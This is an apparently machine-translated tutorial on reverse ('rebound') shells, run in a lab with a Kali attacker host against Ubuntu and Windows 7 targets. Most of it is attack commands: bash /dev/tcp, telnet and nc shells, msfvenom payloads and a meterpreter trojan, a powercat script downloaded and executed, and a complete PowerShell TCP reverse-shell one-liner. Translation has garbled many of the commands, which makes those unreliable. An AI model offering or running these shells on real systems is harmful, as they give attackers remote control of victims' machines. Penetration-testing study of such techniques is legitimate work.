0x00 rebound shell overview
Rebound shell: namely reverse shell, listening established in our own public network vps, and then let bounce a shell server to connect to our own host, to a remote control server through shell rebound.
0x01 rebound shell reasons
Because the firewall is usually the case, lack of rights, and other occupied port, can not be connected directly to the target host, then you need to bounce shell, so that the target host vps we'll take the initiative to connect to the public network.
0x02 Linux shell under rebound
lab environment:
Attack Host: kali: 192.168.217.135
Destination Host: ubuntu: 192.168.217.132
1.Bash rebound
1) monitor the implementation of the attack on the host:
-lVP Port nc // set listening port
2) rebound shell on the target host:
-i bash> & / dev / TCP / XXXX / Port 0 > & . 1
@ -i bash: bash open an interactive
//> &: The standard output and standard error output is redirected to a file / dev / tcp /, i.e., transmitted to a remote
/// dev / tcp / xxxx / port : socket calls, establish a socket connection, where xxxx to bounce to the host ip, port to port
// 0> & 1: standard input standard output is redirected to achieve interaction with the rebound out of the shell
Linux file descriptors:
0 - Represents the standard input stdin, using <or << . 1 - stdout represent standard output, using> or >> 2 - stderr represent standard error output, using 2> or 2 >>
3) Return to attack aircraft, shell rally success
2.telnet rebound shell
Run the attack aircraft, listening two ports (one for input and one for output):
nc -lvp 4444 nc -lvp 5555
Performed on the target machine:
Telnet 192.168 . 217.135 4444 | / bin / the bash | Telnet 192.168 . 217.135 5555 // herein by listening to two ports, the use of time and then reversely connected to pipe character, the character is the role of the pipeline before the pipeline at the output of a duct input after the break, so it may be an input device (keyboard) remote port 4444 input command, the output of the command to the local / bin / bash, explain the execution command, the command execution results and errors in the local shell enter 5555 to the remote port.
After a successful rebound shell, execute commands listening 4444 port terminal, the results in the other output terminal
3.nc rebound shell
Attack aircraft execute commands on the monitor:
n Port -lvp
Execute commands on the target machine:
-e -t nc / bin / bash ip Port // using nc command to establish a direct connection tcp session, then rebounded local connection to the target host bash through this session
// - with the back of the e parameter represents the program to be executed after creating the connection, where representatives can (/ bin / bash), which is a rebound in the remote execution of a local shell after shell to a remote connection to a remote
If the target is not -e host linux release parameters, choose the following ways:
nc ip port1|/bin/bash|ip port2
Success rebound
4. use msfvenom
Use msfvenom attack on the panel to search for related payload (python here for an example)
msfvenom -l payloads | grep 'cmd/unix/reverse'
We can see a variety of ways to achieve rebound in the shell
Excuting an order:
msfvenom -p cmd/unix/reverse_python lhost=192.168.217.135 lport=6666
To obtain the corresponding payload
Then start nc listening on the attack
n Port -lvp
payload msfvenom given execution on the target host
Rally success
Under 0x03 Windows shell rebound
lab environment:
Attack Host: kali: 192.168.217.135
Destination Host: Win7: 192.168.217.130
1.nc rebound shell
Attack aircraft execute commands on the monitor:
n Port -lvp
Performed on the target machine:
nc.exe -e cmd.exe 192.168 . 217 135 6666
Success rebound shell
2.msfvenom rebound shell
Search on attack aircraft payload windows x64 tcp of:
msfvenom -l payload | grep windows | grip x64 | grep tcp
Here select windows / x64 / meterpreter / reverse_tcp generation Trojan file
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.217.135 lport=6666 -f exe >test.exe
Move the Trojan file to your desktop easily copied to the destination machine
Use msfconsole eavesdropping attack machine:
use exploit/multi/handler set payload windows/x64/meterpreter/reverse_tcp set lhost 192.168.217.135 set lport 6666 exploit
Execution test.exe Trojan files on the target machine
We can see on the rebound successful attack aircraft
3.powershell rebound shell
Attack aircraft execute commands on the monitor:
n Port -lvp
On the target machine:
1) Execute the command
powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1'); powercat -c 192.168.217.135 -p 6666 -e cmd
Rally success
2) custom function powershell rebound shell:
powershell -nop -c "$client = New-Object Net.Sockets.TCPClient('192.168.217.135',6666);$stream = $client.GetStream(); [byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){; $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
Rally success
Reference links
https://www.cnblogs.com/threesoil/p/10958126.html
https://www.anquanke.com/post/id/99793
https://www.freebuf.com/articles/system/178150.html